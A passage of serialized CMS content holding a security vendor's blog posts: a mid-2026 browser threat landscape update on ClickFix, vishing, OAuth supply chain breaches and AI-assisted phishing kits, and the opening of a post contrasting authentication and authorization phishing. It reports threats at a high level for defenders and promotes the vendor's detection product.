",{"data":2581,"content":2582,"nodeType":879},{},[2583,2587,2595],{"data":2584,"marks":2585,"value":2586,"nodeType":883},{},[],"The speed of technique adoption across these platforms is itself accelerating. ",{"data":2588,"content":2590,"nodeType":940},{"uri":2589},"https:\u002F\u002Fsublime.security\u002Fblog\u002Fflowerstorm-unleashes-the-krakvm-phaas-operators-turn-to-vm-based-obfuscation\u002F",[2591],{"data":2592,"marks":2593,"value":2594,"nodeType":883},{},[],"FlowerStorm adopted",{"data":2596,"marks":2597,"value":2598,"nodeType":883},{},[]," KrakVM (an open-source JavaScript VM that compiles malicious JS into encrypted bytecode, defeating email security static analysis) within a month of KrakVM's public release on GitHub. The gap between a new evasion technique appearing publicly and its incorporation into commodity phishing kits has compressed to weeks.",{"data":2600,"content":2601,"nodeType":879},{},[2602,2606,2614,2618,2626],{"data":2603,"marks":2604,"value":2605,"nodeType":883},{},[],"At the same time, target surfaces are expanding: ",{"data":2607,"content":2609,"nodeType":940},{"uri":2608},"https:\u002F\u002Fsecuritylabs.datadoghq.com\u002Farticles\u002Fbehind-the-console-aws-aitm-phishing-kit-and-beyond\u002F",[2610],{"data":2611,"marks":2612,"value":2613,"nodeType":883},{},[],"Datadog documented",{"data":2615,"marks":2616,"value":2617,"nodeType":883},{},[]," an AWS console AiTM kit that dynamically adapts to the victim's configured second factor (an example of ",{"data":2619,"content":2621,"nodeType":940},{"uri":2620},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fmfa-downgrade-attacks",[2622],{"data":2623,"marks":2624,"value":2625,"nodeType":883},{},[],"MFA downgrade",{"data":2627,"marks":2628,"value":2629,"nodeType":883},{},[]," in the wild), extending AiTM phishing from IdPs and SaaS applications to cloud infrastructure consoles.",{"data":2631,"content":2632,"nodeType":1036},{},[2633],{"data":2634,"marks":2635,"value":2637,"nodeType":883},{},[2636],{"type":916},"ClickFix as a service",{"data":2639,"content":2640,"nodeType":879},{},[2641,2645,2653,2657,2665],{"data":2642,"marks":2643,"value":2644,"nodeType":883},{},[],"ClickFix has also continued to industrialize. ",{"data":2646,"content":2648,"nodeType":940},{"uri":2647},"https:\u002F\u002Fblog.sekoia.io\u002Funveiling-errtraffic-inside-a-growing-clickfix-malware-distribution-framework\u002F",[2649],{"data":2650,"marks":2651,"value":2652,"nodeType":883},{},[],"Sekoia documented",{"data":2654,"marks":2655,"value":2656,"nodeType":883},{},[]," the ErrTraffic MaaS platform achieving a 60% victim conversion rate, while researchers ",{"data":2658,"content":2660,"nodeType":940},{"uri":2659},"https:\u002F\u002Fkqlquery.com\u002Fposts\u002Fclickfix-gift-that-keeps-on-giving\u002F",[2661],{"data":2662,"marks":2663,"value":2664,"nodeType":883},{},[],"mapped approximately 3,000 live ClickFix payloads",{"data":2666,"marks":2667,"value":2668,"nodeType":883},{},[]," being served through API-driven backends that dynamically generate uniquely obfuscated payloads per victim — essentially the ClickFix PhaaS equivalent.",{"data":2670,"content":2671,"nodeType":879},{},[2672,2676,2684,2688,2696],{"data":2673,"marks":2674,"value":2675,"nodeType":883},{},[],"The technique has also expanded cross-platform, with Unit 42 documenting ",{"data":2677,"content":2679,"nodeType":940},{"uri":2678},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fnew-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer\u002F",[2680],{"data":2681,"marks":2682,"value":2683,"nodeType":883},{},[],"macOS ClickFix variants",{"data":2685,"marks":2686,"value":2687,"nodeType":883},{},[]," that mount DMGs and bypass Gatekeeper to deliver AMOS infostealer. At the mass deployment end, over ",{"data":2689,"content":2691,"nodeType":940},{"uri":2690},"https:\u002F\u002Fblog.xlab.qianxin.com\u002Fghost-cms-mass-compromised-via-cve-2026-26980-now-fueling-clickfix-attacks\u002F",[2692],{"data":2693,"marks":2694,"value":2695,"nodeType":883},{},[],"700 Ghost CMS sites were compromised",{"data":2697,"marks":2698,"value":2699,"nodeType":883},{},[]," to serve ClickFix payloads in May, and the Gizmodo homepage was injected in June.",{"data":2701,"content":2702,"nodeType":879},{},[2703,2707,2715,2719,2727],{"data":2704,"marks":2705,"value":2706,"nodeType":883},{},[],"Nation-state actors are building around ClickFix too. Two DPRK subgroups independently stood up ClickFix infrastructure in July: ",{"data":2708,"content":2710,"nodeType":940},{"uri":2709},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F07\u002Fbluenoroff-zoom-phishing-kit-profiles.html",[2711],{"data":2712,"marks":2713,"value":2714,"nodeType":883},{},[],"BlueNoroff",{"data":2716,"marks":2717,"value":2718,"nodeType":883},{},[]," targeting crypto professionals via Zoom impersonation with wallet profiling before payload delivery, and ",{"data":2720,"content":2722,"nodeType":940},{"uri":2721},"https:\u002F\u002Fsocradar.io\u002Fblog\u002Fdprk-clickfake-pylangghost-golangghost-rats\u002F",[2723],{"data":2724,"marks":2725,"value":2726,"nodeType":883},{},[],"Famous Chollima",{"data":2728,"marks":2729,"value":2730,"nodeType":883},{},[]," embedding ClickFix in multi-stage fake job interviews.",{"data":2732,"content":2733,"nodeType":1036},{},[2734],{"data":2735,"marks":2736,"value":2738,"nodeType":883},{},[2737],{"type":916},"Vishing as a payload delivery mechanism",{"data":2740,"content":2741,"nodeType":879},{},[2742],{"data":2743,"marks":2744,"value":2745,"nodeType":883},{},[],"Vishing functions as a reliable delivery mechanism for all of these payloads, leveraged by ShinyHunters, Pink, and Helix (among many others) to deliver AiTM and device code phishing. A human operator on a phone call drives the victim through a browser-based technical payload, and the vishing delivery gets around email security controls.",{"data":2747,"content":2748,"nodeType":879},{},[2749,2753,2761],{"data":2750,"marks":2751,"value":2752,"nodeType":883},{},[],"When Push researchers ",{"data":2754,"content":2756,"nodeType":940},{"uri":2755},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Finside-criminal-phishing-panel\u002F",[2757],{"data":2758,"marks":2759,"value":2760,"nodeType":883},{},[],"infiltrated the phishing panels",{"data":2762,"marks":2763,"value":2764,"nodeType":883},{},[]," linked to ShinyHunters' campaigns, we found the mechanics for a live attacker relaying credentials and pushing new prompts in real time during the call, across 400+ linked domains and four infrastructure clusters.",{"data":2766,"content":2767,"nodeType":879},{},[2768,2772,2780,2784,2792,2796,2804,2808,2816],{"data":2769,"marks":2770,"value":2771,"nodeType":883},{},[],"The financial scale is now quantifiable: ",{"data":2773,"content":2775,"nodeType":940},{"uri":2774},"https:\u002F\u002Fwww.darkreading.com\u002Fcyberattacks-data-breaches\u002Fsilent-ransom-us-law-firms-extortion-attacks",[2776],{"data":2777,"marks":2778,"value":2779,"nodeType":883},{},[],"Luna Moth",{"data":2781,"marks":2782,"value":2783,"nodeType":883},{},[]," (Silent Ransom Group), a ",{"data":2785,"content":2787,"nodeType":940},{"uri":2786},"https:\u002F\u002Fwww.crowdstrike.com\u002Fen-us\u002Fadversaries\u002Fchatty-spider\u002F",[2788],{"data":2789,"marks":2790,"value":2791,"nodeType":883},{},[],"Russia-linked Conti spinoff",{"data":2793,"marks":2794,"value":2795,"nodeType":883},{},[]," operating independently of the Com, has extracted ",{"data":2797,"content":2799,"nodeType":940},{"uri":2798},"https:\u002F\u002Fwww.theinsurer.com\u002Fti\u002Fnews\u002Fexclusive-weil-gotshal-paid-double-digit-millions-in-suppression-payment-to-luna-2026-05-27\u002F",[2800],{"data":2801,"marks":2802,"value":2803,"nodeType":883},{},[],"up to $48 million",{"data":2805,"marks":2806,"value":2807,"nodeType":883},{},[]," from Am Law 100 firms in 2026 alone, with 48 law firms on their leak site and the ",{"data":2809,"content":2811,"nodeType":940},{"uri":2810},"https:\u002F\u002Fwww.ic3.gov\u002FCSA\u002F2026\u002F260526.pdf",[2812],{"data":2813,"marks":2814,"value":2815,"nodeType":883},{},[],"FBI issuing a dedicated flash alert",{"data":2817,"marks":2818,"value":1350,"nodeType":883},{},[],{"data":2820,"content":2821,"nodeType":879},{},[2822,2826,2834,2838,2846],{"data":2823,"marks":2824,"value":2825,"nodeType":883},{},[],"The infrastructure behind these campaigns is industrializing independently. ",{"data":2827,"content":2829,"nodeType":940},{"uri":2828},"https:\u002F\u002Fwww.okta.com\u002Fblog\u002Fthreat-intelligence\u002Fbehind-the-scenes-of-a-vishing-operation\u002F",[2830],{"data":2831,"marks":2832,"value":2833,"nodeType":883},{},[],"Okta obtained access to Work Panel",{"data":2835,"marks":2836,"value":2837,"nodeType":883},{},[],", a multi-tenant vishing MaaS platform where phishing site standup is a one-button operation and callers are deliberately insulated from the credentials they help steal. Zscaler separately ",{"data":2839,"content":2841,"nodeType":940},{"uri":2840},"https:\u002F\u002Fwww.zscaler.com\u002Fblogs\u002Fsecurity-research\u002Fhelpdesk-hijackers-teams-vishing-quick-assist-and-gogrpc-backdoor",[2842],{"data":2843,"marks":2844,"value":2845,"nodeType":883},{},[],"documented a dedicated Teams-vishing initial access broker",{"data":2847,"marks":2848,"value":2849,"nodeType":883},{},[]," operating since January 2026, building bespoke post-access tooling and selling access to ransomware operators.",{"data":2851,"content":2852,"nodeType":1036},{},[2853],{"data":2854,"marks":2855,"value":2857,"nodeType":883},{},[2856],{"type":916},"OAuth supply chain attacks",{"data":2859,"content":2860,"nodeType":879},{},[2861,2865,2872],{"data":2862,"marks":2863,"value":2864,"nodeType":883},{},[],"The OAuth supply chain dimension has also continued to produce confirmed victims. The ",{"data":2866,"content":2867,"nodeType":940},{"uri":2202},[2868],{"data":2869,"marks":2870,"value":2871,"nodeType":883},{},[],"Salesloft\u002FDrift supply chain attack",{"data":2873,"marks":2874,"value":2875,"nodeType":883},{},[]," in 2025 set the template: compromise one SaaS vendor, steal OAuth tokens, access 700+ downstream customer Salesforce environments.",{"data":2877,"content":2878,"nodeType":879},{},[2879,2883,2891,2895,2903,2907,2915],{"data":2880,"marks":2881,"value":2882,"nodeType":883},{},[],"In 2026, the ",{"data":2884,"content":2886,"nodeType":940},{"uri":2885},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fvimeo-data-breach-exposes-personal-information-of-119-000-people\u002F",[2887],{"data":2888,"marks":2889,"value":2890,"nodeType":883},{},[],"Anodot compromise",{"data":2892,"marks":2893,"value":2894,"nodeType":883},{},[]," cascaded through to Vimeo, Rockstar Games, and Zara. The ",{"data":2896,"content":2898,"nodeType":940},{"uri":2897},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Funpacking-the-vercel-breach\u002F",[2899],{"data":2900,"marks":2901,"value":2902,"nodeType":883},{},[],"Context.ai → Vercel",{"data":2904,"marks":2905,"value":2906,"nodeType":883},{},[]," breach followed the same structural pattern. And the ",{"data":2908,"content":2910,"nodeType":940},{"uri":2909},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fklue-oauth-breach-victim-list-grows-as-icarus-hackers-claim-attack\u002F",[2911],{"data":2912,"marks":2913,"value":2914,"nodeType":883},{},[],"Klue\u002FIcarus breach",{"data":2916,"marks":2917,"value":2918,"nodeType":883},{},[]," in June — where attackers pivoted from a legacy credential through stored OAuth tokens to exfiltrate Salesforce data from Huntress, Recorded Future, and Jamf among others — showed that OAuth tokens have become a tried and tested lateral movement vector in SaaS environments.",{"data":2920,"content":2921,"nodeType":905},{},[],{"data":2923,"content":2924,"nodeType":909},{},[2925],{"data":2926,"marks":2927,"value":2929,"nodeType":883},{},[2928],{"type":916},"AI is a force multiplier for attackers",{"data":2931,"content":2932,"nodeType":879},{},[2933],{"data":2934,"marks":2935,"value":2936,"nodeType":883},{},[],"Much of the security industry's AI threat discussion has focused on autonomous offensive AI and novel attack classes like prompt injection. But the place where AI is having the most measurable impact right now is less dramatic and more consequential: it's accelerating how the techniques we've already been tracking get built and operated.",{"data":2938,"content":2939,"nodeType":879},{},[2940],{"data":2941,"marks":2942,"value":2943,"nodeType":883},{},[],"The evidence is visible at every layer of the attack chain. Pretty much every phishing kit we come across in 2026 shows clear signs of vibe coding. For the classic AiTM lure, we used to find heavy obfuscation — attackers used to put a lot of effort into hiding their attacks. But now, they're essentially built to be disposable, and are full of verbose comments and nicely named unobfuscated functions. Why bother hiding when you can just spin up a new one? This is particularly notable when it comes to device code phishing, which owes its massive scale-up this year to vibecoded kits. ",{"data":2945,"content":2946,"nodeType":879},{},[2947,2951,2959],{"data":2948,"marks":2949,"value":2950,"nodeType":883},{},[],"You can see more examples of these kits under the hood in our blog post ",{"data":2952,"content":2954,"nodeType":940},{"uri":2953},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Finside-criminal-phishing-panel",[2955],{"data":2956,"marks":2957,"value":2958,"nodeType":883},{},[],"infiltrating a criminal phishing panel. ",{"data":2960,"marks":2961,"value":21,"nodeType":883},{},[],{"data":2963,"content":2967,"nodeType":971},{"target":2964},{"sys":2965},{"id":2966,"type":976,"linkType":977},"01mOiserRBXraawXwQyJNm",[],{"data":2969,"content":2970,"nodeType":879},{},[2971],{"data":2972,"marks":2973,"value":2974,"nodeType":883},{},[],"Beyond vibe-coded kits, attackers are embedding AI as an integrated operational capability. ",{"data":2976,"content":2977,"nodeType":1531},{},[2978,3000,3021,3043,3065],{"data":2979,"content":2980,"nodeType":1535},{},[2981],{"data":2982,"content":2983,"nodeType":879},{},[2984,2988,2996],{"data":2985,"marks":2986,"value":2987,"nodeType":883},{},[],"The first major device code phishing kit identified in the wild, EvilTokens, ",{"data":2989,"content":2991,"nodeType":940},{"uri":2990},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Frailway-paas-m365-token-replay-campaign",[2992],{"data":2993,"marks":2994,"value":2995,"nodeType":883},{},[],"heavily used Railway",{"data":2997,"marks":2998,"value":2999,"nodeType":883},{},[],", a PaaS built for vibe coding with prompt-based deployment and teardown of infrastructure. EvilTokens itself packaged AI workflows for email filter bypass, lure tailoring, and identifying high-value mailboxes. ",{"data":3001,"content":3002,"nodeType":1535},{},[3003],{"data":3004,"content":3005,"nodeType":879},{},[3006,3010,3017],{"data":3007,"marks":3008,"value":3009,"nodeType":883},{},[],"Kali365's E2 edition includes an AI-powered BEC module that ",{"data":3011,"content":3012,"nodeType":940},{"uri":2399},[3013],{"data":3014,"marks":3015,"value":3016,"nodeType":883},{},[],"uses Claude Sonnet",{"data":3018,"marks":3019,"value":3020,"nodeType":883},{},[]," to score intercepted conversations for fraud opportunity and draft contextual wire-transfer redirect replies — not an autonomous attack, but an AI-augmented workflow that makes an existing phishing kit more effective.",{"data":3022,"content":3023,"nodeType":1535},{},[3024],{"data":3025,"content":3026,"nodeType":879},{},[3027,3030,3039],{"data":3028,"marks":3029,"value":21,"nodeType":883},{},[],{"data":3031,"content":3033,"nodeType":940},{"uri":3032},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F07\u002Fexposed-server-reveals-ai-assisted.html",[3034],{"data":3035,"marks":3036,"value":3038,"nodeType":883},{},[3037],{"type":948},"Rapid7's analysis of an exposed server",{"data":3040,"marks":3041,"value":3042,"nodeType":883},{},[]," containing a complete phishing toolkit turned up over 1,000 delivery artifacts alongside hardcoded paths to AI coding tools and LLM-style documentation.",{"data":3044,"content":3045,"nodeType":1535},{},[3046],{"data":3047,"content":3048,"nodeType":879},{},[3049,3053,3061],{"data":3050,"marks":3051,"value":3052,"nodeType":883},{},[],"Three independent operators were ",{"data":3054,"content":3056,"nodeType":940},{"uri":3055},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F07\u002Fmisconfigured-server-reveals-three.html",[3057],{"data":3058,"marks":3059,"value":3060,"nodeType":883},{},[],"found running kits from public GitHub forks",{"data":3062,"marks":3063,"value":3064,"nodeType":883},{},[]," with minimal, AI-assisted customization: one had been operating for over a year with 218 victims across 12 countries, running infrastructure that would previously have required significantly more technical ability to maintain. ",{"data":3066,"content":3067,"nodeType":1535},{},[3068],{"data":3069,"content":3070,"nodeType":879},{},[3071,3075,3083],{"data":3072,"marks":3073,"value":3074,"nodeType":883},{},[],"The tooling itself is starting to embed AI as a product feature — ",{"data":3076,"content":3078,"nodeType":940},{"uri":3077},"https:\u002F\u002Fwww.varonis.com\u002Fblog\u002Fdolphin-x-stealer",[3079],{"data":3080,"marks":3081,"value":3082,"nodeType":883},{},[],"Dolphin X",{"data":3084,"marks":3085,"value":3086,"nodeType":883},{},[],", a new MaaS infostealer targeting 300+ applications across browsers, password managers, cloud CLI tools, and crypto wallets, ships an AI Profiler that scores infected machines by application usage and installed software, then delivers daily ranked summaries so operators can prioritize high-value victims from thousands of infections.",{"data":3088,"content":3089,"nodeType":879},{},[3090,3094,3102,3106,3113,3117,3125],{"data":3091,"marks":3092,"value":3093,"nodeType":883},{},[],"AI adoption itself has also become an attack surface. Users searching for AI desktop applications are already looking to download and install software, and attackers are capitalizing on that behavior: a ",{"data":3095,"content":3097,"nodeType":940},{"uri":3096},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Ffakeagent-claude-desktop-malvertising-ends-in-dotnet-rat",[3098],{"data":3099,"marks":3100,"value":3101,"nodeType":883},{},[],"malicious Claude.ai Artifact impersonating a download portal",{"data":3103,"marks":3104,"value":3105,"nodeType":883},{},[]," drew 7,100 visits via Bing search ads and compromised 29 organizations in 48 hours, following the ",{"data":3107,"content":3108,"nodeType":940},{"uri":1198},[3109],{"data":3110,"marks":3111,"value":3112,"nodeType":883},{},[],"LLMShare attack pattern",{"data":3114,"marks":3115,"value":3116,"nodeType":883},{},[]," we documented in May. A second campaign, ",{"data":3118,"content":3120,"nodeType":940},{"uri":3119},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Fmacsync-stealer-rat-reverse-engineering",[3121],{"data":3122,"marks":3123,"value":3124,"nodeType":883},{},[],"MacSync",{"data":3126,"marks":3127,"value":3128,"nodeType":883},{},[],", used a claude.ai conversation styled as an installation guide to deliver a macOS infostealer via a ClickFix-adjacent terminal paste, also distributed through Google Ads. In both cases, the AI platform's trusted domain carried the malicious content past URL reputation filters.",{"data":3130,"content":3131,"nodeType":1036},{},[3132],{"data":3133,"marks":3134,"value":3136,"nodeType":883},{},[3135],{"type":916},"But the core techniques aren't changing",{"data":3138,"content":3139,"nodeType":879},{},[3140,3144,3152],{"data":3141,"marks":3142,"value":3143,"nodeType":883},{},[],"AI compresses the bottom layers of the ",{"data":3145,"content":3147,"nodeType":940},{"uri":3146},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fthe-pyramid-of-pain-in-the-ai-era\u002F",[3148],{"data":3149,"marks":3150,"value":3151,"nodeType":883},{},[],"Pyramid of Pain",{"data":3153,"marks":3154,"value":3155,"nodeType":883},{},[]," (unique hashes, domains, IP addresses, host artifacts) by enabling faster domain rotation, cheaper kit development, and rotating payloads, but the technique-level behaviors remain unchanged.",{"data":3157,"content":3158,"nodeType":879},{},[3159],{"data":3160,"marks":3161,"value":3162,"nodeType":883},{},[],"A phishing page still has to harvest credentials. Device code phishing still has to abuse the authorization grant. ClickFix still has to inject a clipboard payload. Those behavioral signatures are structurally resistant to AI-driven variation because changing them means changing how the attack works.",{"data":3164,"content":3165,"nodeType":905},{},[],{"data":3167,"content":3168,"nodeType":909},{},[3169],{"data":3170,"marks":3171,"value":3173,"nodeType":883},{},[3172],{"type":916},"What this means for defenders",{"data":3175,"content":3176,"nodeType":879},{},[3177],{"data":3178,"marks":3179,"value":3180,"nodeType":883},{},[],"Every trend documented here converges on the same control point: the browser. The AI acceleration that makes all of it faster and cheaper doesn't change where the attacks execute, or how Push intercepts them.",{"data":3182,"content":3183,"nodeType":1531},{},[3184,3194,3204,3214],{"data":3185,"content":3186,"nodeType":1535},{},[3187],{"data":3188,"content":3189,"nodeType":879},{},[3190],{"data":3191,"marks":3192,"value":3193,"nodeType":883},{},[],"For AiTM phishing, Push's behavioral detection analyzes and blocks the phishing page in real time, regardless of which domains or hosting infrastructure the kit uses on any given day.",{"data":3195,"content":3196,"nodeType":1535},{},[3197],{"data":3198,"content":3199,"nodeType":879},{},[3200],{"data":3201,"marks":3202,"value":3203,"nodeType":883},{},[],"For device code phishing, Push detects both the phishing pages associated with device code kits and provides an additional layer on the legitimate device code authentication pages themselves, so users cannot enter attacker-supplied codes.",{"data":3205,"content":3206,"nodeType":1535},{},[3207],{"data":3208,"content":3209,"nodeType":879},{},[3210],{"data":3211,"marks":3212,"value":3213,"nodeType":883},{},[],"For ClickFix, Push detects the clipboard injection at the moment the malicious payload is written.",{"data":3215,"content":3216,"nodeType":1535},{},[3217],{"data":3218,"content":3219,"nodeType":879},{},[3220],{"data":3221,"marks":3222,"value":3223,"nodeType":883},{},[],"For OAuth supply chain attacks, Push monitors and controls consent flows at the browser layer, so security teams can govern which applications obtain tokens in the first place.",{"data":3225,"content":3226,"nodeType":879},{},[3227],{"data":3228,"marks":3229,"value":3230,"nodeType":883},{},[],"As AI enables more kits, more operators, and faster infrastructure rotation, indicator-based defenses that target domains, IPs, and hashes become less effective by the day. Behavioral detection that targets technique-class signatures (what the attack does) is the approach that scales.",{"data":3232,"content":3233,"nodeType":905},{},[],{"data":3235,"content":3236,"nodeType":879},{},[3237],{"data":3238,"marks":3239,"value":1729,"nodeType":883},{},[],{"data":3241,"content":3242,"nodeType":879},{},[3243],{"data":3244,"marks":3245,"value":1736,"nodeType":883},{},[],{"data":3247,"content":3248,"nodeType":879},{},[3249,3252,3261],{"data":3250,"marks":3251,"value":21,"nodeType":883},{},[],{"data":3253,"content":3255,"nodeType":940},{"uri":3254},"https:\u002F\u002Fpushsecurity.com\u002Fdemo\u002F",[3256],{"data":3257,"marks":3258,"value":3260,"nodeType":883},{},[3259],{"type":948},"Book a live demo to learn more.",{"data":3262,"marks":3263,"value":21,"nodeType":883},{},[],"Browser threat landscape: mid-year update 2026","PhaaS industrialization, Scattered Spider copycats, and AI-augmented tooling — what the threat landscape looks like in 2026 so far.","2026-08-10T00:00:00.000Z","browser-threat-landscape-mid-year-update-2026",{"items":3269},[3270,3274],{"sys":3271,"name":3273},{"id":3272},"6A5RXS31ZQx3PwryGb1IMy","Browser-based attacks",{"sys":3275,"name":343},{"id":3276},"4ksQNCFeBf8H4QIORqpRLw",{"items":3278},[3279],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":3280},{"url":872},{"__typename":1967,"sys":3282,"content":3284,"title":3917,"synopsis":3918,"hashTags":59,"publishedDate":3919,"slug":3920,"tagsCollection":3921,"authorsCollection":3927},{"id":3283},"1m3Hh9Gg9aHXFckcnlDi4V",{"json":3285},{"nodeType":875,"data":3286,"content":3287},{},[3288,3295,3302,3319,3337,3361,3389,3395,3398,3406,3413,3420,3426,3434,3445,3464,3470,3478,3511,3517,3524,3531,3539,3550,3568,3586,3589,3597,3604,3611,3619,3626,3642,3654,3666,3673,3685,3692,3699,3705,3713,3720,3727,3730,3738,3745,3752,3758,3782,3800,3818,3824,3827,3835,3847,3859,3871,3878,3886],{"nodeType":879,"data":3289,"content":3290},{},[3291],{"nodeType":883,"value":3292,"marks":3293,"data":3294},"For most of phishing's history, the objective was simple: steal the credential. Whether through a fake login page twenty years ago or through an attacker in the middle (AiTM) reverse proxy today, the entire attack chain has been oriented around defeating authentication. So defenders have focused on making the login harder to compromise.",[],{},{"nodeType":879,"data":3296,"content":3297},{},[3298],{"nodeType":883,"value":3299,"marks":3300,"data":3301},"This investment is starting to pay off. While MFA as a blanket control is routinely defeated by AiTM attacks (the default phishing method today), phishing-resistant passkeys are used in a relatively small number of logins, but growing steadily each year. And core identity platforms are taking steps to make them the default method. For example, Microsoft is making passkeys the default sign-in method for Entra ID from September 2026, and users stuck on SMS or voice authentication will be force-migrated. ",[],{},{"nodeType":879,"data":3303,"content":3304},{},[3305,3309,3315],{"nodeType":883,"value":3306,"marks":3307,"data":3308},"AiTM phishing kits remain dominant, but the detection surface is improving — behavioral detections now catch the kit's page behavior regardless of the domain it's hosted on. Authentication controls are genuinely getting harder to beat (though even with passkeys, not impossible, as shown in ",[],{},{"nodeType":940,"data":3310,"content":3311},{"uri":2620},[3312],{"nodeType":883,"value":1082,"marks":3313,"data":3314},[],{},{"nodeType":883,"value":3316,"marks":3317,"data":3318}," — shown in the video below).",[],{},{"nodeType":879,"data":3320,"content":3321},{},[3322,3326,3333],{"nodeType":883,"value":3323,"marks":3324,"data":3325},"So it makes sense that attackers are looking for alternatives. In 2026, we’ve seen ",[],{},{"nodeType":940,"data":3327,"content":3328},{"uri":1298},[3329],{"nodeType":883,"value":2195,"marks":3330,"data":3332},[3331],{"type":948},{},{"nodeType":883,"value":3334,"marks":3335,"data":3336}," explode into mainstream adoption, with 30+ distinct kits now offering the technique (this number jumps every time we write a new update). ",[],{},{"nodeType":879,"data":3338,"content":3339},{},[3340,3344,3349,3353,3357],{"nodeType":883,"value":3341,"marks":3342,"data":3343},"Device code phishing sees the attacker target the authorization layer instead — OAuth consent flows that operate ",[],{},{"nodeType":883,"value":3345,"marks":3346,"data":3348},"after",[3347],{"type":891},{},{"nodeType":883,"value":3350,"marks":3351,"data":3352}," authentication has already succeeded. We're calling this class of attack ",[],{},{"nodeType":883,"value":1248,"marks":3354,"data":3356},[3355],{"type":916},{},{"nodeType":883,"value":3358,"marks":3359,"data":3360},", and it represents a structural shift in how identity attacks work.",[],{},{"nodeType":879,"data":3362,"content":3363},{},[3364,3368,3375,3379,3385],{"nodeType":883,"value":3365,"marks":3366,"data":3367},"But device code phishing is one technique in a broader shift. ConsentFix, ",[],{},{"nodeType":940,"data":3369,"content":3370},{"uri":1331},[3371],{"nodeType":883,"value":3372,"marks":3373,"data":3374},"first discovered by Push in December 2025",[],{},{"nodeType":883,"value":3376,"marks":3377,"data":3378},", has already been ",[],{},{"nodeType":940,"data":3380,"content":3381},{"uri":1343},[3382],{"nodeType":883,"value":1346,"marks":3383,"data":3384},[],{},{"nodeType":883,"value":3386,"marks":3387,"data":3388},". ",[],{},{"nodeType":971,"data":3390,"content":3394},{"target":3391},{"sys":3392},{"id":3393,"type":976,"linkType":977},"3tRYNcUvN7KeFqzaGb2Cmn",[],{"nodeType":905,"data":3396,"content":3397},{},[],{"nodeType":909,"data":3399,"content":3400},{},[3401],{"nodeType":883,"value":3402,"marks":3403,"data":3405},"Authentication phishing vs. authorization phishing",[3404],{"type":916},{},{"nodeType":879,"data":3407,"content":3408},{},[3409],{"nodeType":883,"value":3410,"marks":3411,"data":3412},"Authentication phishing targets the login — the moment a user proves their identity. AiTM reverse-proxy kits like Tycoon2FA and Sneaky2FA relay credentials and session tokens in real time, effectively defeating MFA by capturing the authenticated session as it's created. This has been the dominant phishing technique since roughly 2023, and it remains the most common attack we come up against in the wild.",[],{},{"nodeType":879,"data":3414,"content":3415},{},[3416],{"nodeType":883,"value":3417,"marks":3418,"data":3419},"Authorization phishing targets what happens after the login. Instead of stealing a session from the authentication flow, these attacks abuse OAuth authorization mechanisms — consent grants, device code flows, and token exchanges. The attacker never touches the authentication flow at all.",[],{},{"nodeType":971,"data":3421,"content":3425},{"target":3422},{"sys":3423},{"id":3424,"type":976,"linkType":977},"3ADEkZ8KQKs4ndH1T7PdaX",[],{"nodeType":1036,"data":3427,"content":3428},{},[3429],{"nodeType":883,"value":3430,"marks":3431,"data":3433},"Consent phishing: the classic OAuth attack",[3432],{"type":916},{},{"nodeType":879,"data":3435,"content":3436},{},[3437,3441],{"nodeType":883,"value":703,"marks":3438,"data":3440},[3439],{"type":916},{},{"nodeType":883,"value":3442,"marks":3443,"data":3444}," is the oldest of the three, and the classic OAuth attack. The attacker creates a malicious third-party application and tricks the user into granting it permissions via an OAuth consent prompt. The app then uses those permissions to access the user's data via API.",[],{},{"nodeType":879,"data":3446,"content":3447},{},[3448,3452,3460],{"nodeType":883,"value":3449,"marks":3450,"data":3451},"Identity providers have substantially hardened their default configurations against consent phishing. Most platforms today do not allow users to consent to apps that have not already been admin-consented into the tenant. For example, ",[],{},{"nodeType":940,"data":3453,"content":3455},{"uri":3454},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fhow-consent-phishing-is-evolving\u002F",[3456],{"nodeType":883,"value":3457,"marks":3458,"data":3459},"Microsoft now blocks unverified third-party app consent by default",[],{},{"nodeType":883,"value":3461,"marks":3462,"data":3463},", as does Google, and GitHub restricts OAuth apps to org-owner approval. ",[],{},{"nodeType":971,"data":3465,"content":3469},{"target":3466},{"sys":3467},{"id":3468,"type":976,"linkType":977},"1KJGoZABIAsuXG5QjBVWOY",[],{"nodeType":1036,"data":3471,"content":3472},{},[3473],{"nodeType":883,"value":3474,"marks":3475,"data":3477},"Device code phishing: the breakout threat of 2026",[3476],{"type":916},{},{"nodeType":879,"data":3479,"content":3480},{},[3481,3485,3489,3496,3500,3507],{"nodeType":883,"value":361,"marks":3482,"data":3484},[3483],{"type":916},{},{"nodeType":883,"value":3486,"marks":3487,"data":3488}," targets a different OAuth flow entirely: the ",[],{},{"nodeType":940,"data":3490,"content":3491},{"uri":2443},[3492],{"nodeType":883,"value":3493,"marks":3494,"data":3495},"RFC 8628 device authorization grant",[],{},{"nodeType":883,"value":3497,"marks":3498,"data":3499},", originally designed for input-constrained devices like smart TVs and IoT hardware. The attacker generates a code, delivers it to the victim via a phishing page that auto-polls for a fresh code on page load (which can arrive over email, Teams messages, LinkedIn DMs, voice calls, malvertising, or compromised websites), and the victim enters the code on the real device code for the target app. In the wild this is usually Microsoft, but last year's ",[],{},{"nodeType":940,"data":3501,"content":3502},{"uri":960},[3503],{"nodeType":883,"value":3504,"marks":3505,"data":3506},"ShinyHunters",[],{},{"nodeType":883,"value":3508,"marks":3509,"data":3510}," campaign saw Salesforce targeted 